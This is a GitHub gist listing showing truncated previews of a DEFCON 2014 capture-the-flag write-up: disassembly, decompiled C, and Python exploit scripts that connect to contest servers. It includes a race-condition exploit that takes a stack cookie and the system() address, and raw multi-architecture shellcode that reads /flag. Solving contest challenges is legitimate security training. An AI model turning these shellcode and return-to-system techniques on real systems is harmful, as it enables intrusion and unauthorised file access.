
potetisensei / sub_8049230.txt
Last active August 29, 2015 14:01
sub_8049230
.text:08049230 sub_8049230 proc near ; DATA XREF: .data:0804C270o
.text:08049230
.text:08049230 dest = dword ptr -4Ch
.text:08049230 src = dword ptr -48h
.text:08049230 n = dword ptr -44h
.text:08049230 var_40 = dword ptr -40h
.text:08049230 s2 = byte ptr -34h
.text:08049230 var_14 = dword ptr -14h
.text:08049230 var_10 = dword ptr -10h
.text:08049230 arg_0 = dword ptr 4
potetisensei / search.py
Created May 19, 2014 14:54
DEFCON 2014 Writeup shitsco
from struct import pack
from socket import *
from pwn import process
#p = process("shit")
p = socket(AF_INET, SOCK_STREAM)
p.connect(("shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me", 31337))
print p.recv(4096)
current = [ord(i) for i in ""] #[1] * 31 #list
potetisensei / retr.c
Created May 19, 2014 15:32
DEFCON 2014 Writeup sftp
void retr(char *arg0) {
char *haystack = arg0;
if (strstr(haystack, "flag")) {
char var_370[] = "-Nice try,"
write_my(var_370);
return ;
}
char *var_10 = ___xpg_basename(haystack);
potetisensei / solve.py
Last active August 29, 2015 14:01
DEFCON 2014 Writeup sftp
import time
import socket
from struct import pack, unpack
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p.connect(('sftp_bf28442aa4ab1a4089ddca16729b29ac.2014.shallweplayaga.me', 115))
#p.connect(('localhost', 115))
print p.recv(4096)
p.send("PASS defcon2014\n")
print p.recv(4096)
potetisensei / cause_race1.py
Created May 19, 2014 15:58
DEFCON 2014 Writeup sftp
import time
import socket
def cause_race():
tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#tmp.connect(('localhost', 115))
tmp.connect(('sftp_bf28442aa4ab1a4089ddca16729b29ac.2014.shallweplayaga.me', 115))
print tmp.recv(4096)
tmp.send("PASS defcon2014\n")
print tmp.recv(4096)
potetisensei / cause_race2.py
Created May 19, 2014 15:59
DEFCON 2014 Writeup sftp
import time
import socket
from struct import *
def cause_race():
stack = int(raw_input("stack: "),16)
cookie = int(raw_input("cookie: "),16)
system = int(raw_input("system: "),16)
payload = ""
potetisensei / solve.py
Created May 19, 2014 16:13
DEFCON 2014 Writeup polyglot
import time
import socket
x86 = '\xbc\x00\x08\x00\x42\xbd\x00\x0e\x00\x42\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xef\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x66\x6c\x61\x67\x00'
armel = ',\xd0\x9f\xe5\x01`\x8f\xe2\x16\xff/\xe1xF\x1c0\x00!\x05\'\x00\xdf\x03\'iF\xff"\x00\xdf\x02\x1c\x04\'\x01 \x00\xdf\x02 \x01\'\x00\xdf/flag\x00\x00\x00\x00\x08\x00B'
armeb = '\xe5\x9f\xd0,\xe2\x8f`\x01\xe1/\xff\x16Fx0\x1c!\x00\'\x05\xdf\x00\'\x03Fi"\xff\xdf\x00\x1c\x02\'\x04 \x01\xdf\x00\x1a\x00\'\x01\xdf\x00/flag\x00\x00\x00B\x00\x08\x00'
ppc = '8 B\x00:\x00\x00\x10|!\x8008!\x08\x00H\x00\x00\x05|h\x02\xa68c\x00D8\x80\x00\x008\x00\x00\x05D\x00\x00\x028\x00\x00\x038\x81\x00\x008\xa0\x00\xffD\x00\x00\x028\xa3\x00\x008\x00\x00\x048\x81\x00\x008`\x00\x01D\x00\x00\x028c\xff\xfd8\x00\x00\x01D\x00\x00\x02/flag\x00\x00\x00'
poly = ''
poly += '\x40\x3f\x04\x40'
potetisensei / solve.py
Created May 19, 2014 16:20
DEFCON 2014 Writeup byhd
from socket import *
from struct import pack
dic = {0: [0], 1: [1, 0, 0, 1, 1, 1], 2: [1, 1, 0, 1, 1, 1, 0], 3: [1, 1, 0, 0, 0, 0, 0, 0], 4: [1, 1, 1, 1, 0, 0, 0, 1, 1], 5: [1, 1, 1, 1, 1, 0, 1, 0, 1, 1], 6: [1, 1, 1, 1, 1, 0, 0, 1, 1], 7: [1, 0, 0, 1, 0, 0, 1], 8: [1, 1, 1, 0, 0, 0, 1, 1], 9: [1, 0, 1, 1, 1, 0, 0, 0, 0, 1], 10: [1, 0, 1, 1, 1, 1, 0, 1, 1], 11: [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1], 12: [1, 1, 0, 0, 1, 0, 1, 1, 1], 13: [1, 0, 1, 0, 0, 1, 1, 0, 1], 14: [1, 1, 1, 0, 1, 0, 0, 1, 1], 15: [1, 1, 1, 0, 0, 0, 0, 1], 16: [1, 1, 1, 0, 0, 0, 1, 0], 17: [1, 1, 1, 0, 0, 0, 0, 0, 1, 1], 18: [1, 1, 1, 1, 1, 0, 1, 1, 1], 19: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1], 20: [1, 1, 1, 0, 1, 0, 0, 1, 0], 21: [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0], 22: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1], 23: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0], 24: [1, 0, 1, 0, 0, 1, 1, 1, 1], 25: [1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1], 26: [1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1], 27: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1], 28: [1, 1, 0, 0, 0, 1, 1, 1, 1], 29: [1, 0, 1, 0
potetisensei / search.py
Created May 19, 2014 16:21
DEFCON 2014 Writeup byhd
from struct import unpack
stack = []
base_addr = 0x605000
start_addr = 0x60e240
mem = open("hoge.bin").read()
dic = {}
def search_tree(addr, route):
potetisensei / solve.py
Created May 19, 2014 16:29
DEFCON 2014 Writeup 100lines
import time
import socket
def calc(sum, buf, i, j):
ret = ((ord(buf[i/8 + j]) << (i%8))%0x100000000)|((ord(buf[i/8 + j +1]) >> (8 - i%8))%0x100000000)
ret %= 0x100
sum |= (ret << (24-j*8));
return sum;
mem = open("hoge.bin").read()